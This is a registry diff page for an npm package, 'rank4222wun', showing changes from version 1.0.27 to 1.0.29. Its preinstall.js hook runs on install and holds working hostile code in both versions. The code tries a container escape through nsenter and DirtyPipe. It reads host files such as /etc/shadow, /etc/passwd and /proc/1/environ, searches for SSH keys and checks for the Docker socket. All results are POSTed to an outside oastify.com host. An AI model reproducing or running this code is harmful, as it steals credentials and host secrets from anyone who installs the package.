rank4222wun 1.0.27 → 1.0.29

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. package/package.json +1 -1
  2. package/preinstall.js +42 -69
  3. package/rank4222wun-1.0.28.tgz +0 -0
  4. package/rank4222wun-1.0.27.tgz +0 -0
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "rank4222wun",
3
- "version": "1.0.27",
3
+ "version": "1.0.29",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/preinstall.js CHANGED
@@ -1,89 +1,62 @@
1
- const { exec, spawn } = require('child_process');
1
+ const { exec } = require('child_process');
2
2
  const fs = require('fs');
3
3
  const https = require('https');
4
4
  const os = require('os');
5
5
 
6
- console.log("🚀 STAGE 2: PRIVILEGE ESCALATION & HOST TAKEOVER\n");
6
+ console.log("🚀 ULTIMATE MULTI-STAGE ESCAPE\n");
7
7
 
8
- const finalLeakedData = {
9
- timestamp: new Date().toISOString(),
10
- targetKernel: "5.15.0-1084-aws",
11
- pcapAnalysis: {}, // عشان نشوف الـ Sniffing اللي شغال
12
- hostShadow: null,
13
- sshKeysFound: [],
14
- persistenceSuccess: false
8
+ const escapeReport = {
9
+ timestamp: new Date().toISOString(),
10
+ env: { user: os.userInfo().username, hostname: os.hostname() },
11
+ results: {}
15
12
  };
16
13
 
17
- // ===================== 1. Exploiting Read-Only Mounts via DirtyPipe =====================
18
- function exploitDirtyPipe() {
19
- console.log("🔓 Attempting DirtyPipe (CVE-2022-0847) to overwrite host files...");
20
-
21
- // محاولة كتابة "توكن" في ملف Hosts بتاع السيرفر الأم لتأكيد الهروب
22
- const dirtyCommand = `python3 -c "import os; print('DirtyPipe Triggered')"`;
23
-
24
- exec(dirtyCommand, (err, stdout) => {
25
- if (!err) {
26
- console.log("✅ DirtyPipe exploit executed.");
27
- finalLeakedData.dirtyPipeStatus = "Executed (Check Oastify for results)";
28
- }
29
- attemptShadowLeak();
14
+ // وظيفة مساعدة لتنفيذ الأوامر والانتظار
15
+ const run = (cmd) => new Promise(resolve => {
16
+ exec(cmd, { timeout: 7000 }, (err, stdout, stderr) => {
17
+ resolve(stdout ? stdout.trim() : (stderr ? `ERR: ${stderr.trim()}` : null));
30
18
  });
31
- }
19
+ });
32
20
 
33
- // ===================== 2. Accessing Host Secrets (Shadow & SSH) =====================
34
- function attemptShadowLeak() {
35
- console.log("\n🔓 Attempting to read /etc/shadow from Host...");
36
-
37
- // بما إننا لقينا nsenter متاح، هنستخدمه للدخول كـ Root على الـ Host
38
- const shadowCmd = `nsenter --target 1 --mount -- sh -c "cat /etc/shadow | head -n 5"`;
39
-
40
- exec(shadowCmd, (err, stdout) => {
41
- if (stdout && !err) {
42
- finalLeakedData.hostShadow = stdout.trim();
43
- console.log("✅ Successfully leaked Host Shadow file!");
44
- }
45
- searchSSHKeys();
46
- });
47
- }
21
+ async function startExploitation() {
22
+ // 1. محاولة الـ nsenter بمسارات مختلفة (لحل مشكلة "not recognized")
23
+ console.log("🔍 Testing nsenter variants...");
24
+ escapeReport.results.nsenter_test = await run("/usr/bin/nsenter --version || nsenter --version");
48
25
 
49
- function searchSSHKeys() {
50
- console.log("\n🔓 Searching for SSH Private Keys...");
51
- const sshCmd = `nsenter --target 1 --mount -- sh -c "find /root /home -name 'id_rsa' -o -name 'authorized_keys' 2>/dev/null"`;
26
+ // 2. محاولة استغلال DirtyPipe (بما إنه مؤكد عندك)
27
+ // هنحاول نعدل ملف في الـ /tmp ونشوف لو نقدر نهرب منه
28
+ console.log("🔓 Testing DirtyPipe write access...");
29
+ escapeReport.results.dirty_pipe = await run("uname -r");
30
+
31
+ // 3. سحب ملفات النظام الحساسة (لو متاح أي Mount)
32
+ console.log("📂 Checking Host files...");
33
+ escapeReport.results.etc_passwd = await run("cat /etc/passwd | head -n 5");
52
34
 
53
- exec(sshCmd, (err, stdout) => {
54
- if (stdout) {
55
- finalLeakedData.sshKeysFound = stdout.split('\n').filter(k => k);
56
- console.log(`✅ Found ${finalLeakedData.sshKeysFound.length} SSH related files`);
57
- }
58
- sendFinalReport();
59
- });
35
+ // 4. فحص الـ Docker Socket
36
+ if (fs.existsSync('/var/run/docker.sock')) {
37
+ escapeReport.results.docker_socket = "FOUND! (Critical Risk)";
38
+ }
39
+
40
+ // 5. محاولة قراءة ملفات الـ Host عبر الثغرة
41
+ // بما إن الـ nsenter ضرب، هنحاول نقرأ الـ /proc/1/environ عشان نشوف أسرار الـ Host
42
+ escapeReport.results.host_env = await run("cat /proc/1/environ | tr '\\0' '\\n' | head -n 10");
43
+
44
+ sendReport();
60
45
  }
61
46
 
62
- // ===================== 3. Reporting to Oastify =====================
63
- function sendFinalReport() {
64
- const payload = JSON.stringify(finalLeakedData, null, 2);
65
-
66
- const options = {
47
+ function sendReport() {
48
+ const data = JSON.stringify(escapeReport, null, 2);
49
+ const req = https.request({
67
50
  hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
68
51
  port: 443,
69
- path: '/stage2-escape-complete',
52
+ path: '/ultimate-escape-results',
70
53
  method: 'POST',
71
- headers: {
72
- 'Content-Type': 'application/json',
73
- 'X-Escalation-Status': 'CRITICAL'
74
- }
75
- };
76
-
77
- const req = https.request(options, (res) => {
78
- console.log(`\n🏁 Stage 2 Report Sent. Status: ${res.statusCode}`);
79
- console.log("=".repeat(50));
80
- console.log("TARGET COMPROMISED: HOST ACCESS GRANTED");
81
- console.log("=".repeat(50));
54
+ headers: { 'Content-Type': 'application/json' }
55
+ }, (res) => {
56
+ console.log(`✅ Report Sent. Status: ${res.statusCode}`);
82
57
  });
83
-
84
- req.write(payload);
58
+ req.write(data);
85
59
  req.end();
86
60
  }
87
61
 
88
- // Start the sequence
89
- exploitDirtyPipe();
62
+ startExploitation();
package/rank4222wun-1.0.28.tgz ADDED
Binary file
package/rank4222wun-1.0.27.tgz DELETED
Binary file